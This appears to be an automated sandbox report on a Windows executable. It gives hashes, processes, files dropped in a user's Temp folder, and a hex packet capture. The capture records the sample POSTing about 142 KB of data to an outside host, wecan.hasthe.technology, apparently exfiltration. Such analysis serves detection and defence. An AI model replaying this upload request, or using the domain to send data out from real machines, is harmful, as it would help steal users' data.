Analysis Date: 2018-04-29 02:20:58
MD5: 2da1c7f143f91f2bfe3d223a81f89c1b
SHA1: 680d856f96591a565c7f06ce12387809f95e72cf

Static Details:

File type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
PEhash

Runtime Details:

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\680d856f96591a565c7f06ce12387809f95e72cf.exe

Creates File: C:\Users\Phil\AppData\Local\Temp\680d856f96591a565c7f06ce12387809f95e72cf.exe
Creates File: C:\Users\Phil\AppData\Local\Temp\rifaien2-CSv2H6Cb7VvSCZqh.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7570 6c6f6164 20485454   POST /upload HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20776563   P/1.1..Host: wec
0x00000020 (00032)   616e2e68 61737468 652e7465 63686e6f   an.hasthe.techno
0x00000030 (00048)   6c6f6779 0d0a4163 63657074 3a202a2f   logy..Accept: */
0x00000040 (00064)   2a0d0a43 6f6e7465 6e742d4c 656e6774   *..Content-Lengt
0x00000050 (00080)   683a2031 34323735 360d0a45 78706563   h: 142756..Expec
0x00000060 (00096)   743a2031 30302d63 6f6e7469 6e75650d   t: 100-continue.
0x00000070 (00112)   0a436f6e 74656e74 2d547970 653a206d   .Content-Type: m
0x00000080 (00128)   756c7469 70617274 2f666f72 6d2d6461   ultipart/form-da
0x00000090 (00144)   74613b20 626f756e 64617279 3d2d2d2d   ta; boundary=---
0x000000a0 (00160)   2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d   ----------------
0x000000b0 (00176)   2d2d2d2d 2d363536 62656238 35653262   -----656beb85e2b
0x000000c0 (00192)   61323038 340d0a0d 0a                  a2084....


Strings